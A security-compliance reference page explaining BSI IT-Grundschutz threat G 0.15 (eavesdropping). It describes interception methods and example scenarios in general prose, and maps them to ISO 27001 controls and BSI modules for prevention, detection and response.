Elementary Threat · BSI IT-Grundschutz

G 0.15 — Eavesdropping

Updated on 17 April 2026 4 min Reviewed by: Cenedril Editorial

A.5.14A.5.15A.5.16A.5.17A.5.18A.5.23A.5.29A.6.7A.7.6A.7.9A.7.11A.7.12A.7.14A.8.1A.8.3A.8.4A.8.5A.8.6A.8.7A.8.10A.8.14A.8.15A.8.16A.8.18A.8.20A.8.21A.8.22 BSI IT-GrundschutzISO 27001ISO 27002

Unencrypted emails are postcards. Anyone with access to a transmission path — a network technician, a compromised router, an attacker on the same Wi-Fi — can read along. This applies to the entire path from sender to recipient, across every single intermediate hop.

Eavesdropping is the targeted interception of communication — from simply overhearing a conversation to the technically complex interception of radio and line signals. The BSI lists this threat as G 0.15.

What’s behind it?

Every communication link — whether copper cable, fibre optic, Wi-Fi or mobile network — is fundamentally tappable. There are no tap-proof cables; only the required effort differs. Whether an attacker invests that effort depends on how valuable the information is and how high the detection risk turns out to be.

Interception methods

Network sniffing — in unswitched networks or via ARP spoofing in switched LANs, an attacker can capture the entire data traffic. Particularly critical: plain-text protocols such as HTTP, FTP and Telnet transmit passwords without any protection.
Wi-Fi eavesdropping — insufficiently secured wireless networks (open hotspots, WEP encryption) allow the capture of all communication. Even WPA2-secured networks are vulnerable when an attacker intercepts the handshake and brute-forces the password.
Telephony interception — VoIP calls transmitted unencrypted over the network can be captured with freely available tools. For classical telephony, physical access to the line is enough.
Wire tapping — copper cables can be tapped inductively without physically cutting the line. For fibre optic the effort is higher but in principle possible (fibre tapping). Whether a line is being tapped can only be determined with considerable measurement effort.
Interception via compromised infrastructure — routers, switches and firewalls on which an attacker has gained access can serve as tap points. Packet captures then deliver the entire data traffic passing through.

Impact

Intercepted information includes access credentials, business communications, personal data and technical configurations. Particularly dangerous is the interception of authentication data on plain-text protocols, because an attacker thereby gains direct access to systems. The transition to active attack (identity theft, manipulation) is seamless.

Practical examples

Wi-Fi sniffing in a hotel. A business traveller uses the open Wi-Fi in a hotel to retrieve emails and log in to the company VPN. An attacker on the same Wi-Fi performs a man-in-the-middle attack and captures the VPN credentials. With those the attacker gains access to the corporate network and exfiltrates data unnoticed for weeks.

Inductive tapping of network cabling. In an office building with multiple tenants, network cables run through shared cable ducts. An attacker places an inductive tap on a copper cable and captures the data traffic. Since the internal network is unencrypted, they capture login credentials, emails and database queries in plain text.

VoIP capture via compromised switch. An attacker exploits a vulnerability in the web interface of a network switch to gain administrative rights. They enable port mirroring and send a copy of all VoIP traffic to their machine. Business negotiations, HR conversations and strategic planning are recorded over weeks.

Relevant controls

The following ISO 27001 controls mitigate this threat. (You’ll find the complete list of 27 mapped controls below in the section “ISO 27001 Controls Covering This Threat”.)

Prevention:

A.8.20 — Networks security: Segmentation and protection of the network against unauthorised capture.
A.8.21 — Security of network services: Encryption as a requirement for all network services.
A.5.14 — Information transfer: Rules for secure transfer across all channels.
A.8.5 — Secure authentication: Strong authentication methods that provide protection even when traffic is intercepted (e.g. multi-factor).
A.7.12 — Cabling security: Physical protection of cables against eavesdropping and manipulation.

Detection:

A.8.15 — Logging: Detection of unusual network activity such as ARP spoofing or port mirroring.
A.8.16 — Monitoring activities: Active monitoring for anomalies in network traffic.

Response:

A.5.29 — Information security during disruption: Ensuring communication security even in exceptional situations.

BSI IT-Grundschutz

The BSI IT-Grundschutz catalogue links G 0.15 to the following modules:

NET.1.2 (Network management) — requirements for the secure administration of network components.
NET.2.1 (Wi-Fi operation) — security requirements for wireless networks, including encryption and authentication.
OPS.1.1.7 (System management) — secure remote maintenance and system administration.
INF.12 (Cabling) — physical protection of network and building cabling.

Sources

BSI IT-Grundschutz: Elementary Threats, G 0.15 — original description of the elementary threat
ISO/IEC 27002:2022 Section 8.20 — implementation guidance on network security
BSI: Technical Guideline TR-02102 (Cryptographic Procedures) — recommendations on cryptographic algorithms and key lengths

ISO 27001 Controls Covering This Threat

A.5.14 Information transfer A.5.15 Access control A.5.16 Identity management A.5.17 Authentication information A.5.18 Access rights A.5.23 Information security for use of cloud services A.5.29 Information security during disruption A.6.7 Remote working A.7.6 Working in secure areas A.7.9 Security of assets off-premises A.7.11 Supporting utilities A.7.12 Cabling security A.7.14 Secure disposal or re-use of equipment A.8.1 User endpoint devices A.8.3 Information access restriction A.8.4 Access to source code A.8.5 Secure authentication A.8.6 Capacity management A.8.7 Protection against malware A.8.10 Information deletion A.8.14 Redundancy of information processing facilities A.8.15 Logging A.8.16 Monitoring activities A.8.18 Use of privileged utility programs A.8.20 Networks security A.8.21 Security of network services A.8.22 Segregation of networks

Frequently asked questions

Is wire tapping really still relevant?

Yes. Unencrypted protocols such as HTTP, FTP or Telnet transmit access credentials in plain text. In internal networks, encryption is often omitted because the line is assumed to be secure. An attacker with physical access to the network or control over a compromised switch can read the entire traffic.

How do I detect whether a line is being tapped?

In practice this is extremely difficult and requires elaborate measurement techniques. That's why the focus is on prevention: encryption of all communication channels makes intercepted data worthless, regardless of whether an attack takes place or not.

Is HTTPS alone sufficient to protect against eavesdropping?

HTTPS reliably protects data in transit between browser and server. It does not, however, protect against eavesdropping on the end device itself, in unencrypted backend connections or when certificates are misconfigured. Full protection requires end-to-end encryption and regular review of the certificate configuration.